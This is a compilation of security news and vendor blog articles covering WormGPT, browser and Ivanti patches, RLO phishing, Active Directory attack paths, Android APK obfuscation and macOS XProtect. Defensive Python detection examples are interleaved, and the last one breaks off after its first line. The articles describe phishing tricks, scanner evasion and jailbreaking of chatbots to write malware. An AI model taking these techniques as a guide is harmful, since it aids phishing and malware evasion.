WormGPT, a private new chatbot service advertised as a way to use Artificial Intelligence (AI) to write malicious software without all the pesky prohibitions on such activity enforced by the likes of ChatGPT and Google Bard, has started adding restrictions of its own on how the service can be used. Faced with customers trying to use WormGPT to create ransomware and phishing scams, the 23-year-old Portuguese programmer who created the project now says his service is slowly morphing into “a more controlled environment.”

Image: SlashNext.com.

The large language models (LLMs) made by ChatGPT parent OpenAI or Google or Microsoft all have various safety measures designed to prevent people from abusing them for nefarious purposes — such as creating malware or hate speech. In contrast, WormGPT has promoted itself as a new, uncensored LLM that was created specifically for cybercrime activities.

WormGPT was initially sold exclusively on HackForums, a sprawling, English-language community that has long featured a bustling marketplace for cybercrime tools and services. WormGPT licenses are sold for prices ranging from 500 to 5,000 Euro.

“Introducing my newest creation, ‘WormGPT,’ wrote “Last,” the handle chosen by the HackForums user who is selling the service. “This project aims to provide an alternative to ChatGPT, one that lets you do all sorts of illegal stuff and easily sell it online in the future. Everything blackhat related that you can think of can be done with WormGPT, allowing anyone access to malicious activity without ever leaving the comfort of their home.”

WormGPT’s core developer and frontman “Last” promoting the service on HackForums. Image: SlashNext.

In July, an AI-based security firm called SlashNext analyzed WormGPT and asked it to create a “business email compromise” (BEC) phishing lure that could be used to trick employees into paying a fake invoice.

“The results were unsettling,” SlashNext’s Daniel Kelley wrote. “WormGPT produced an email that was not only remarkably persuasive but also strategically cunning, showcasing its potential for sophisticated phishing and BEC attacks.”

SlashNext asked WormGPT to compose this BEC phishing email. Image: SlashNext.

A review of Last’s posts on HackForums over the years shows this individual has extensive experience creating and using malicious software. In August 2022, Last posted a sales thread for “Arctic Stealer,” a data stealing trojan and keystroke logger that he sold there for many months.

“I’m very experienced with malwares,” Last wrote in a message to another HackForums user last year.

Last has also sold a modified version of the information stealer DCRat, as well as an obfuscation service marketed to malicious coders who sell their creations and wish to insulate them from being modified or copied by customers.

Shortly after joining the forum in early 2021, Last told several different HackForums users his name was Rafael and that he was from Portugal. HackForums has a feature that allows anyone willing to take the time to dig through a user’s postings to learn when and if that user was previously tied to another account.

That account tracing feature reveals that while Last has used many pseudonyms over the years, he originally used the nickname “ruiunashackers.” The first search result in Google for that unique nickname brings up a TikTok account with the same moniker, and that TikTok account says it is associated with an Instagram account for a Rafael Morais from Porto, a coastal city in northwest Portugal.

AN OPEN BOOK

Reached via Instagram and Telegram, Morais said he was happy to chat about WormGPT.

“You can ask me anything,” Morais said. “I’m an open book.”

Morais said he recently graduated from a polytechnic institute in Portugal, where he earned a degree in information technology. He said only about 30 to 35 percent of the work on WormGPT was his, and that other coders are contributing to the project. So far, he says, roughly 200 customers have paid to use the service.

“I don’t do this for money,” Morais explained. “It was basically a project I thought [was] interesting at the beginning and now I’m maintaining it just to help [the] community. We have updated a lot since the release, our model is now 5 or 6 times better in terms of learning and answer accuracy.”

WormGPT isn’t the only rogue ChatGPT clone advertised as friendly to malware writers and cybercriminals. According to SlashNext, one unsettling trend on the cybercrime forums is evident in discussion threads offering “jailbreaks” for interfaces like ChatGPT.

“These ‘jailbreaks’ are specialised prompts that are becoming increasingly common,” Kelley wrote. “They refer to carefully crafted inputs designed to manipulate interfaces like ChatGPT into generating output that might involve disclosing sensitive information, producing inappropriate content, or even executing harmful code. The proliferation of such practices underscores the rising challenges in maintaining AI security in the face of determined cybercriminals.”

Morais said they have been using the GPT-J 6B model since the service was launched, although he declined to discuss the source of the LLMs that power WormGPT. But he said the data set that informs WormGPT is enormous.

“Anyone that tests wormgpt can see that it has no difference from any other uncensored AI or even chatgpt with jailbreaks,” Morais explained. “The game changer is that our dataset [library] is big.”

Morais said he began working on computers at age 13, and soon started exploring security vulnerabilities and the possibility of making a living by finding and reporting them to software vendors.

“My story began in 2013 with some greyhat activities, never anything blackhat tho, mostly bugbounty,” he said. “In 2015, my love for coding started, learning c# and more .net programming languages. In 2017 I’ve started using many hacking forums because I have had some problems home (in terms of money) so I had to help my parents with money… started selling a few products (not blackhat yet) and in 2019 I started turning blackhat. Until a few months ago I was still selling blackhat products but now with wormgpt I see a bright future and have decided to start my transition into whitehat again.”

WormGPT sells licenses via a dedicated channel on Telegram, and the channel recently lamented that media coverage of WormGPT so far has painted the service in an unfairly negative light.

“We are uncensored, not blackhat!” the WormGPT channel announced at the end of July. “From the beginning, the media has portrayed us as a malicious LLM (Language Model), when all we did was use the name ‘blackhatgpt’ for our Telegram channel as a meme. We encourage researchers to test our tool and provide feedback to determine if it is as bad as the media is portraying it to the world.”

It turns out, when you advertise an online service for doing bad things, people tend to show up with the intention of doing bad things with it. WormGPT’s front man Last seems to have acknowledged this at the service’s initial launch, which included the disclaimer, “We are not responsible if you use this tool for doing bad stuff.”

But lately, Morais said, WormGPT has been forced to add certain guardrails of its own.

“We have prohibited some subjects on WormGPT itself,” Morais said. “Anything related to murders, drug traffic, kidnapping, child porn, ransomwares, financial crime. We are working on blocking BEC too, at the moment it is still possible but most of the times it will be incomplete because we already added some limitations. Our plan is to have WormGPT marked as an uncensored AI, not blackhat. In the last weeks we have been blocking some subjects from being discussed on WormGPT.”

Still, Last has continued to state on HackForums — and more recently on the far more serious cybercrime forum Exploit — that WormGPT will quite happily create malware capable of infecting a computer and going “fully undetectable” (FUD) by virtually all of the major antivirus makers (AVs).

“You can easily buy WormGPT and ask it for a Rust malware script and it will 99% sure be FUD against most AVs,” Last told a forum denizen in late July.

Asked to list some of the legitimate or what he called “white hat” uses for WormGPT, Morais said his service offers reliable code, unlimited characters, and accurate, quick answers.

“We used WormGPT to fix some issues on our website related to possible sql problems and exploits,” he explained. “You can use WormGPT to create firewalls, manage iptables, analyze network, code blockers, math, anything.”

Morais said he wants WormGPT to become a positive influence on the security community, not a destructive one, and that he’s actively trying to steer the project in that direction. The original HackForums thread pimping WormGPT as a malware writer’s best friend has since been deleted, and the service is now advertised as “WormGPT – Best GPT Alternative Without Limits — Privacy Focused.”

“We have a few researchers using our wormgpt for whitehat stuff, that’s our main focus now, turning wormgpt into a good thing to [the] community,” he said.

It’s unclear yet whether Last’s customers share that view.

The Good, the Bad and the Ugly in Cybersecurity – Week 31

The Good | High-Severity Flaws Patched in Firefox and Chrome Updates

Browsers are our windows to the internet and due to both their ubiquity and the amount of information they collect, they are often prime targets for threat actors, so there’s good news for Firefox and Chrome users this week as new security patches have been rolled out for both.

On Tuesday, Mozilla released new versions of Firefox 116, Firefox ESR 115.1, and Firefox ESR 102.14, which all include patches for several high-severity vulnerabilities, most prominently CVE-2023-4045, CVE-2023-4046, and CVE-2023-4047. The new iterations prohibit HTML and JavaScript code displayed on one site from accessing content on another site, correct a potentially exploitable crash caused by wrong values during WASM compilation, and resolve a clickjacking issue where users are tricked into giving up risky permissions for microphone, location, and notification services.

On the Google side, the tech firm handed out over $60,000 in bug bounties for three high-severity type confusion vulnerabilities in Chrome’s V8 engine. The latest update, Chrome 115, addresses six other severe flaws relating to issues such as a heap buffer overflow problem which often results in unpredictable behavior or generates incorrect results, crashes, or memory access errors, an insufficient data validation bug, and an inappropriate implementation issue. Users are encouraged to update to versions 115.0.5790.170 for Mac and Linux and to versions 115.0.5790.170/.171 for Windows.

The Bad | More Vulnerabilities Found in Ivanti’s Mobile Device Management Product

Following a maximum severity bypass vulnerability reported last week by Ivanti, the Utah-based IT firm has since issued warnings for two more vulnerabilities also found in its Endpoint Manager Mobile (EPMM) software.

The first of the two is a new path traversal vulnerability, tracked as CVE-2023-35081 (CVSS 7.2), allowing arbitrary file write capabilities. Threat actors exploiting this vulnerability could potentially bypass admin authentication and ACL restrictions to execute OS commands. All supported versions of EPMM, including releases 11.10, 11.9, 11.8, and older are impacted.

The company says that this new vulnerability differs from July’s CVE-2023-35078; however, it acknowledged that attackers could chain the two together for malicious purposes. A joint cybersecurity advisory from both CISA and the Norwegian National Cyber Security Centre (NCSC-NO) explains that chaining the two flaws could translate to privileged access across EPMM systems and the ability to execute uploaded files such as webshells.

The second vulnerability announced this week is tracked as CVE-2023-35082 (CVSS 10.0) and could allow unauthenticated attackers to access the API in older, unsupported versions of the product (11.2 and below).

If exploited, attackers could access users’ personally identifiable information (PII) and make unauthorized changes to the server. Security researchers noted the bug’s close relation to last week’s remote unauthorized API access flaw in that both target the permissive qualities of certain entries in the mifs web application’s security filter chain.

Ivanti has released patches for all three vulnerabilities within the span of two weeks and urged its customers to upgrade to the latest version of EPMM and monitor their systems for signs of breaches.

The Ugly | Microsoft Domains Leveraged in Russian-Backed Teams Phishing Campaigns

Cyber threat group APT29, attributed to Russia’s Foreign Intelligence Service (SVR), was linked this week to a series of attacks on dozens of organizations. Likely indicative of an espionage campaign, the group targeted government agencies, non-government organizations (NGOs), IT and tech services, private manufacturing, and media sectors through phishing messages sent via Microsoft Teams.

According to a report released Wednesday, the attackers used compromised Microsoft 365 tenants to create tech support-themed domains and sent various social engineering lures to trick victims into granting approval for multi-factor authentication (MFA) prompts. The new domains were part of a legitimate Microsoft domain ‘onmicrosoft.com’ that is used when a custom domain is not successfully created.

Using this domain, the spoofed tech support messages would have appeared more trustworthy to the targeted users.

A fake Microsoft Teams message request used in APT29's latest campaign (Source: Microsoft).

APT29 has been operating since at least 2008, crafting attacks against government networks in NATO member countries and in Europe, think tanks, and research institutes. Notoriously, the group is attributed to the SolarWinds supply chain attack that led to the compromise of as many as 18,000 government entities and Fortune 500 companies, at least nine federal agencies, and more than 100 businesses globally.

This latest activity is a timely reminder of just how pernicious and persistent these groups are, and organizations in all verticals are urged to be equally relentless in reinforcing strong cyber hygiene and continued awareness and education efforts.

Teach a Man to Phish and He’s Set for Life

One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days. Like attaching a phishing email to a traditional, clean email message, or leveraging link redirects on LinkedIn, or abusing an encoding method that makes it easy to disguise booby-trapped Microsoft Windows files as relatively harmless documents.

KrebsOnSecurity recently heard from a reader who was puzzled over an email he’d just received saying he needed to review and complete a supplied W-9 tax form. The missive was made to appear as if it were part of a mailbox delivery report from Microsoft 365 about messages that had failed to deliver.

The reader, who asked to remain anonymous, said the phishing message contained an attachment that appeared to have a file extension of “.pdf,” but something about it seemed off. For example, when he downloaded and tried to rename the file, the right arrow key on the keyboard moved his cursor to the left, and vice versa.

The file included in this phishing scam uses what’s known as a “right-to-left override” or RLO character. RLO is a special character within unicode — an encoding system that allows computers to exchange information regardless of the language used — that supports languages written from right to left, such as Arabic and Hebrew.

Look carefully at the screenshot below and you’ll notice that while Microsoft Windows says the file attached to the phishing message is named “lme.pdf,” the full filename is “fdp.eml” spelled backwards. In essence, this is a .eml file — an electronic mail format or email saved in plain text — masquerading as a .PDF file.

“The email came through Microsoft Office 365 with all the detections turned on and was not caught,” the reader continued. “When the same email is sent through Mimecast, Mimecast is smart enough to detect the encoding and it renames the attachment to ‘___fdp.eml.’ One would think Microsoft would have had plenty of time by now to address this.”

Indeed, KrebsOnSecurity first covered RLO-based phishing attacks back in 2011, and even then it wasn’t a new trick.
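The RLO trick described above, and the gateway behaviour of renaming the attachment so its real extension is visible, as an added defender-side example (not code from KrebsOnSecurity, Microsoft or Mimecast). It parses a constructed message whose attachment name is U+202E followed by “fdp.eml”, reports how the name renders versus what the OS actually opens, and rewrites it; the rendering model is a simplification of the full Unicode bidi algorithm, and the "_" substitution is this example's own scheme.

```python
"""Spot attachment names that use Unicode bidi overrides to hide their true extension."""
import email
import email.policy
import os
import unicodedata

# Unicode bidirectional controls. Any of these in a filename is unusual; the
# right-to-left override (U+202E) is the one this phishing lure relies on.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
    "\u2066", "\u2067", "\u2068", "\u2069",
}


def rendered_name(name: str) -> str:
    """Approximate what a file browser shows for `name`.

    Simplified model: text after an RLO (U+202E) is drawn reversed until a
    PDF (U+202C) or the end of the string; other bidi controls are invisible.
    """
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            end = name.find("\u202c", i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def stored_name(name: str) -> str:
    """The name with all bidi controls removed: what the OS actually opens."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def analyze_filename(name: str) -> dict:
    """Compare the displayed extension with the real one and flag a mismatch."""
    controls = sorted({unicodedata.name(ch) for ch in name if ch in BIDI_CONTROLS})
    shown, real = rendered_name(name), stored_name(name)
    shown_ext = os.path.splitext(shown)[1].lower()
    real_ext = os.path.splitext(real)[1].lower()
    return {
        "raw": name,
        "displayed": shown,
        "actual": real,
        "displayed_ext": shown_ext,
        "actual_ext": real_ext,
        "bidi_controls": controls,
        "suspicious": bool(controls) and shown_ext != real_ext,
    }


def safe_attachment_name(name: str) -> str:
    """Rewrite the name so the real extension shows (each bidi control becomes '_')."""
    return "".join("_" if ch in BIDI_CONTROLS else ch for ch in name)


def scan_message(raw: str) -> list:
    """Return one analysis per named attachment in an RFC 822 message."""
    msg = email.message_from_string(raw, policy=email.policy.default)
    findings = []
    for part in msg.iter_attachments():
        fname = part.get_filename()
        if fname:
            findings.append(analyze_filename(fname))
    return findings


# Constructed sample (not the reader's real email). The RFC 2231 parameter
# decodes to U+202E + "fdp.eml", which Explorer would render as "lme.pdf".
SAMPLE_EML = """\
From: Mailbox Delivery <no-reply@example.invalid>
To: reader@example.invalid
Subject: Delivery report: messages awaiting restoration
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="sample-boundary"

--sample-boundary
Content-Type: text/plain; charset="utf-8"

Some messages could not be delivered. See the attached report.

--sample-boundary
Content-Type: application/octet-stream
Content-Disposition: attachment; filename*=utf-8''%E2%80%AEfdp.eml
Content-Transfer-Encoding: base64

SGVsbG8gd29ybGQ=

--sample-boundary--
"""

if __name__ == "__main__":
    for finding in scan_message(SAMPLE_EML):
        print(finding, "->", safe_attachment_name(finding["raw"]))
```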

Opening the .eml file generates a rendering of a webpage that mimics an alert from Microsoft about wayward messages awaiting restoration to your inbox. Clicking on the “Restore Messages” link there bounces you through an open redirect on LinkedIn before forwarding to the phishing webpage.

As noted here last year, scammers have long taken advantage of a marketing feature on the business networking site which lets them create a LinkedIn.com link that bounces your browser to other websites, such as phishing pages that mimic top online brands (but chiefly LinkedIn’s parent firm Microsoft).

The landing page after the LinkedIn redirect displays what appears to be an Office 365 login page, which is naturally a phishing website made to look like an official Microsoft Office property.

In summary, this phishing scam uses an old RLO trick to fool Microsoft Windows into thinking the attached file is something else, and when clicked the link uses an open redirect on a Microsoft-owned website (LinkedIn) to send people to a phishing page that spoofs Microsoft and tries to steal customer email credentials.

According to the latest figures from Check Point Software, Microsoft was by far the most impersonated brand for phishing scams in the second quarter of 2023, accounting for nearly 30 percent of all brand phishing attempts.

An unsolicited message that arrives with one of these .eml files as an attachment is more than likely to be a phishing lure. The best advice to sidestep phishing scams is to avoid clicking on links that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of dire consequences should you fail to respond or act quickly.

If you’re unsure whether a message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark to avoid potential typosquatting sites.

AD Security Assessments and Attack Paths | How to Achieve Greater Visibility

Active Directory (AD) has become a primary target for attackers launching identity-centric attacks. Fortunately, there are several tools available to help enterprise security teams get clearer visibility into their Active Directory instances and address any vulnerabilities they uncover.

One popular tool in use by analysts is Attack Path graphs, which can be used to show the possible paths an attacker can take to escalate from a standard user all the way to a highly privileged account, such as a prized Domain Admin.

While this kind of visualization can be helpful, it is no substitute for an Active Directory assessment tool that not only closes vulnerabilities but encourages best practices. To illustrate the difference, in this post we’ll compare both approaches across two example scenarios that represent common situations found in the enterprise.

Case Study: Basic Privilege Escalation

In the first scenario, we’ll look at a simple Attack Path and compare it to the results of an AD security assessment for the same issue.

In our first example, a compromised standard user ‘Bob’ happens to be a member of a larger Engineering group, which is a subset of a CAD Tools group. Due to poor configuration and separation of privileges, this group is also a member of a Service Installers group, which itself happens to be a member of the Domain Admins group.

Clearly, even though Bob is supposed to have only Standard User privileges, this nested set of relationships allows an attacker who compromises Bob’s account to gain Domain Admin rights.

At this point, let’s explore the context an AD security assessment tool can provide in a situation like this, and how administrators might be able to use this information to mitigate this issue and prevent it from happening again.

An AD security assessment tool will provide:

  • A list of all users that have privileged access. This would comprise all members from the nested groups of all privileged groups.
  • A list of groups nested within the privileged group to be removed. This is the shortcut the administrator needs to mitigate the issue.
  • The best practice of not nesting groups into privileged groups. This eliminates choke points so that it’s more difficult for members to be granted unintentional privileged access. This is the guidance the administrator needs to prevent the issue.

The second and third items are the most critical. If we simply removed the Service Installers group from the Domain Admins group (along with any others that may also be nested), the compromised standard user account would no longer be a Domain Admin. By addressing the vulnerability and following best practices, administrators would no longer have to examine graphs and determine where to prune group memberships, essentially making the graph irrelevant.
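The Bob scenario and the three assessment findings above, as an added example (not code from this post or from Singularity Ranger AD). It models a constructed directory as a group-to-members map, walks nested membership to list every effective Domain Admin, names the groups nested directly in the privileged group (the ones to remove), and shows that pulling them out also removes the chain the Attack Path graph would draw.

```python
"""Model nested AD group membership and produce the findings an assessment tool reports."""
from collections import deque

# Constructed directory (not a real domain): group name -> direct members.
# Anything that appears as a key is a group; everything else is a user account.
MEMBERSHIP = {
    "Domain Admins": ["alice", "Service Installers"],
    "Service Installers": ["svc_deploy", "CAD Tools"],
    "CAD Tools": ["Engineering"],
    "Engineering": ["bob", "carol"],
    "Helpdesk": ["dave"],
}


def is_group(name, membership):
    return name in membership


def effective_members(group, membership):
    """All user accounts that end up in `group` through any depth of nesting."""
    users, seen, stack = set(), set(), [group]
    while stack:
        g = stack.pop()
        if g in seen:  # guards against circular nesting
            continue
        seen.add(g)
        for member in membership.get(g, []):
            if is_group(member, membership):
                stack.append(member)
            else:
                users.add(member)
    return users


def membership_chain(user, group, membership):
    """Shortest nesting chain from `group` down to `user`, or None: the Attack Path view."""
    parent = {group: None}
    queue = deque([group])
    while queue:
        g = queue.popleft()
        for member in membership.get(g, []):
            if member in parent:
                continue
            parent[member] = g
            if member == user:
                chain = [member]
                while parent[chain[-1]] is not None:
                    chain.append(parent[chain[-1]])
                return chain[::-1]
            if is_group(member, membership):
                queue.append(member)
    return None


def assess(privileged_groups, membership):
    """The three findings an assessment reports, for each privileged group."""
    report = {}
    for pg in privileged_groups:
        nested = sorted(m for m in membership.get(pg, []) if is_group(m, membership))
        report[pg] = {
            # finding 1: everyone who holds the privilege, directly or via nesting
            "privileged_users": sorted(effective_members(pg, membership)),
            # finding 2: the shortcut to mitigate, i.e. the groups to remove
            "nested_groups_to_remove": nested,
            # finding 3: best practice of not nesting groups into privileged groups
            "nesting_best_practice_violated": bool(nested),
        }
    return report


def remove_nested_groups(privileged_group, membership):
    """Return a copy of the directory with every group pulled out of `privileged_group`."""
    fixed = {g: list(members) for g, members in membership.items()}
    fixed[privileged_group] = [
        m for m in fixed[privileged_group] if not is_group(m, membership)
    ]
    return fixed


if __name__ == "__main__":
    print("before:", assess(["Domain Admins"], MEMBERSHIP))
    print("bob's chain:", membership_chain("bob", "Domain Admins", MEMBERSHIP))
    fixed = remove_nested_groups("Domain Admins", MEMBERSHIP)
    print("after:", assess(["Domain Admins"], fixed))
```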

Case Study: Credentials Cracking

Let’s examine another simple Attack Path.

In the attack path above, a user’s computer (COMPUTER1) has been compromised. From there, an attacker successfully cracks the computer’s local administrator account credentials. The attacker then uses that local administrator account’s password to log in to another computer (COMPUTER2), which was (mis)configured for ease of administration with the same credentials. On COMPUTER2, the attacker cracks the Domain Admin account’s hash, successfully elevating their access.

An Active Directory security assessment tool can quickly mitigate this risk by relaying the following information to an analyst:

  • LAPS (Local Administrator Password Solution) was not detected to be configured in Active Directory. If it was, this would have prevented the attacker from moving from COMPUTER1 to COMPUTER2 using the same local administrator password. Making sure every local administrator account has a different, rotating password is a best practice. LAPS would meet this need.
  • A Domain Admin account had logged into a workstation in the past, leaving a hash behind that the attacker could use. The best practice recommended here is to only use Domain Admin accounts to log on to domain controllers and to clear all hashes on workstations and member servers.

By following the mitigation steps and best practice recommendations of an AD security assessment tool, an administrator can eliminate the potential Attack Path of an attacker and prevent them from exploiting these misconfigurations and vulnerabilities.

Active Directory Risks That Attack Paths Miss

Attack Paths are crafted to show known attacks, whereas closing vulnerabilities eliminates both these and, often, unknown vectors, too. Consequently, it’s more important to eradicate vulnerabilities and follow best practices.

The pictures that Attack Paths paint are an incomplete representation of the actual Active Directory security situation. Graphs showing how the organization could be vulnerable are not as effective as tools that can ensure the AD infrastructure is not exposed nor will be in the future.

Below are some examples of attacks that would not be suitable for elaborate Attack Path graphs, yet it is vital for an AD security assessment to detect each of them.

  • Brute force password attacks – An assessment should detect accounts whose passwords are commonly known or dictionary words, as well as attempts to enter every possible character combination until a password has been “guessed”.
  • Unconstrained delegation exposures – When an AD user or computer object is trusted to delegate to any service using Kerberos. If compromised, this can allow the attacker to impersonate the authenticated account to any service.
  • AdminSDHolder attacks – Adding users or groups to the ACL of the AdminSDHolder template in Active Directory, which is “stamped” onto every privileged user’s and group’s ACL, giving them rights over those accounts.

Singularity™ Ranger® AD scans the Active Directory environment for vulnerabilities such as these and many more, guiding administrators on how to mitigate them and ensuring best practices to prevent them in the future.

Conclusion

While Attack Paths are interesting graphs that can enlighten administrators as to how potential attacks can take place on the network, they are no substitute for a proactive approach that eliminates known vulnerabilities and enforces best practices. Singularity Ranger AD finds vulnerabilities and guides administrators to close them, and keep them closed.

Singularity RANGER | AD Assessor
A cloud-delivered, continuous identity assessment solution designed to uncover vulnerabilities in Active Directory and Azure AD

How Malicious Android Apps Slip Into Disguise

Researchers say mobile malware purveyors have been abusing a bug in the Google Android platform that lets them sneak malicious code into mobile apps and evade security scanning tools. Google says it has updated its app malware detection mechanisms in response to the new research.

At issue is a mobile malware obfuscation method identified by researchers at ThreatFabric, a security firm based in Amsterdam. Aleksandr Eremin, a senior malware analyst at the company, told KrebsOnSecurity they recently encountered a number of mobile banking trojans abusing a bug present in all Android OS versions that involves corrupting components of an app so that its new evil bits will be ignored as invalid by popular mobile security scanning tools, while the app as a whole gets accepted as valid by Android OS and successfully installed.

“There is malware that is patching the .apk file [the app installation file], so that the platform is still treating it as valid and runs all the malicious actions it’s designed to do, while at the same time a lot of tools designed to unpack and decompile these apps fail to process the code,” Eremin explained.

Eremin said ThreatFabric has seen this malware obfuscation method used a few times in the past, but in April 2023 it started finding many more variants of known mobile malware families leveraging it for stealth. The company has since attributed this increase to a semi-automated malware-as-a-service offering in the cybercrime underground that will obfuscate or “crypt” malicious mobile apps for a fee.

Eremin said Google flagged their initial May 9, 2023 report as “high” severity. More recently, Google awarded them a $5,000 bug bounty, even though it did not technically classify their finding as a security vulnerability.

“This was a unique situation in which the reported issue was not classified as a vulnerability and did not impact the Android Open Source Project (AOSP), but did result in an update to our malware detection mechanisms for apps that might try to abuse this issue,” Google said in a written statement.

Google also acknowledged that some of the tools it makes available to developers — including APK Analyzer — currently fail to parse such malicious applications and treat them as invalid, while still allowing them to be installed on user devices.

“We are investigating possible fixes for developer tools and plan to update our documentation accordingly,” Google’s statement continued.

Image: ThreatFabric.

According to ThreatFabric, there are a few telltale signs that app analyzers can look for that may indicate a malicious app is abusing the weakness to masquerade as benign. For starters, they found that apps modified in this way have Android Manifest files that contain newer timestamps than the rest of the files in the software package.

More critically, the Manifest file itself will be changed so that the number of “strings” — plain text in the code, such as comments — specified as present in the app does not match the actual number of strings in the software.
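The first telltale sign above, a manifest whose ZIP timestamp post-dates every other entry in the package, as an added detection example (not ThreatFabric's or Google's code). It reads the per-entry modification times from the APK's ZIP headers and compares AndroidManifest.xml with the newest other entry; the two sample packages are constructed in memory with placeholder contents, and the second sign (a corrupted string count in the binary manifest) is not implemented here.

```python
"""Flag APKs whose AndroidManifest.xml is newer than every other entry in the package."""
import io
import zipfile
from datetime import datetime

MANIFEST = "AndroidManifest.xml"


def entry_times(apk_bytes: bytes) -> dict:
    """Map each ZIP entry name to the modification time stored in its header."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {info.filename: datetime(*info.date_time) for info in zf.infolist()}


def manifest_timestamp_anomaly(apk_bytes: bytes) -> dict:
    """Report the manifest time, the newest other entry, and whether the manifest is newer.

    A build tool writes all entries in one pass, so the manifest normally shares
    its timestamp with the rest; a manifest that post-dates everything else
    suggests it was rewritten after the package was built.
    """
    times = entry_times(apk_bytes)
    if MANIFEST not in times:
        return {"suspicious": False, "manifest": None, "newest_other": None}
    manifest_time = times[MANIFEST]
    others = [t for name, t in times.items() if name != MANIFEST]
    newest_other = max(others) if others else None
    return {
        "suspicious": newest_other is not None and manifest_time > newest_other,
        "manifest": manifest_time,
        "newest_other": newest_other,
    }


def build_sample_apk(manifest_time: tuple, other_time: tuple) -> bytes:
    """Construct a minimal ZIP standing in for an APK (placeholder contents, not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, dt in ((MANIFEST, manifest_time),
                         ("classes.dex", other_time),
                         ("resources.arsc", other_time),
                         ("META-INF/MANIFEST.MF", other_time)):
            info = zipfile.ZipInfo(name, date_time=dt)  # ZIP keeps 2-second precision
            zf.writestr(info, b"placeholder")
    return buf.getvalue()


# Constructed samples: a normal build, and one whose manifest was rewritten months later.
CLEAN_APK = build_sample_apk((2023, 1, 10, 12, 0, 0), (2023, 1, 10, 12, 0, 0))
TAMPERED_APK = build_sample_apk((2023, 4, 20, 9, 30, 0), (2023, 1, 10, 12, 0, 0))

if __name__ == "__main__":
    for label, apk in (("clean", CLEAN_APK), ("tampered", TAMPERED_APK)):
        print(label, manifest_timestamp_anomaly(apk))
```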

One of the mobile malware families known to be abusing this obfuscation method has been dubbed Anatsa, which is a sophisticated Android-based banking trojan that typically is disguised as a harmless application for managing files. Last month, ThreatFabric detailed how the crooks behind Anatsa will purchase older, abandoned file managing apps, or create their own and let the apps build up a considerable user base before updating them with malicious components.

ThreatFabric says Anatsa poses as PDF viewers and other file managing applications because these types of apps already have advanced permissions to remove or modify other files on the host device. The company estimates the people behind Anatsa have delivered more than 30,000 installations of their banking trojan via ongoing Google Play Store malware campaigns.

Google has come under fire in recent months for failing to more proactively police its Play Store for malicious apps, or for once-legitimate applications that later go rogue. This May 2023 story from Ars Technica about a formerly benign screen recording app that turned malicious after garnering 50,000 users notes that Google doesn’t comment when malware is discovered on its platform, beyond thanking the outside researchers who found it and saying the company removes malware as soon as it learns of it.

“The company has never explained what causes its own researchers and automated scanning process to miss malicious apps discovered by outsiders,” Ars’ Dan Goodin wrote. “Google has also been reluctant to actively notify Play users once it learns they were infected by apps promoted and made available by its own service.”

The Ars story mentions one potentially positive change by Google of late: A preventive measure available in Android versions 11 and higher that implements “app hibernation,” which puts apps that have been dormant into a hibernation state that removes their previously granted runtime permissions.

Mac Admins | Why Apple’s Silent Approach to Endpoint Security Should be a Wake-Up Call

If there’s one thing that everyone should be able to agree on about Apple, it is that the company really does think different when it comes to the design of its products, and this is nowhere more obvious than in the company’s approach to endpoint security. Users will find no Defender-like security center built into macOS, and admins and IT teams will search in vain for Apple web portals to log into or extra licenses to buy for ‘top tier’ telemetry.

Unlike rival OS vendors, Apple does endpoint security when – and where – admins and users aren’t looking. This approach has served Apple well from a marketing perspective – there’s a widespread if somewhat misplaced belief that macOS is more secure than Windows – but for small to medium-sized enterprises relying entirely on Apple to keep them safe, this lack of visibility is something to be addressed.

In this post, we’ll shed light on three areas of macOS security that are crucial to understand for businesses that do not currently deploy additional endpoint protection on their macOS devices.

Apple’s Approach to Platform Security

Last updated in May 2022, Apple’s most recent public documentation about protecting against malware on macOS states that its malware defenses are structured in three layers:

Service                                          Technologies
Prevent launch or execution of malware           App Store, or Gatekeeper combined with Notarisation
Block malware from running on customer systems   Gatekeeper, Notarisation and XProtect
Remediate malware that has executed              XProtect

None of the technologies responsible in these layers has much in the way of user or admin-controlled granularity: it’s not possible, for example, to allow or exclude specific applications or code across users or devices. On a single device, a user can make extremely broad system policy decisions (such as allow or deny all apps sourced from outside the App Store), but even then – unless the system is administered by an MDM solution – that policy can be overridden by local users, even without administrator rights.

More concerning from an enterprise security perspective is that there is little visibility into what code has been blocked, when and why, nor is it obvious when these scans are being performed or how effective they have been.

This is a particular worry in terms of malware remediation, which happens silently in the background without warning to the user. In an enterprise setting, this is simply not sufficient: security teams need to understand when malware was introduced to the system, how long it was there and where malware came from if they are to adequately defend the enterprise.

1. XProtect Signatures | Missing Out On the Latest Malware

According to Apple,

macOS includes built-in antivirus technology called XProtect for the signature-based detection and removal of malware. The system uses YARA signatures, a tool used to conduct signature-based detection of malware, which Apple updates regularly.

The last update to Apple’s XProtect.bundle, which contains these YARA signatures, was made on June 29th, although depending on the location of the device the update may not have been delivered until some days later.

Unfortunately, this update did not include any changes to the file signatures that Apple says power XProtect’s blocking abilities. The YARA file bears the same hash as version 2166, updated last February.

If one were to go by the version numbers alone, there should have been 7 updates to XProtect’s YARA rules in the last 12 months, but in fact only three have actually been observed on our test machines. Moreover, the difference between version 2165, released last November, and the version available today is a mere three additional rules covering only two malware families: one for Keysteal and two for a cryptominer known to Apple as Honkbox.

Since both SentinelOne and many other vendors have reported on multiple new macOS malware strains in the last few months alone, it should be concerning to users and admins relying entirely on XProtect’s rules that they are so far behind the rest of the industry.
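The figures above (bundle version, rule count, and whether the YARA file actually changed) are easy to track across a fleet by reading the installed bundle directly. The script below is an added example for this post, not Apple’s tooling: it reads CFBundleShortVersionString from the bundle’s Info.plist, hashes XProtect.yara, counts its rule declarations, and diffs two results so that a version bump that ships an identical YARA file stands out. The bundle path is Apple’s default location on current macOS releases; the rule count is a simple regex match on declarations and is an approximation (a `rule` keyword inside a block comment would also be counted).

```python
import hashlib
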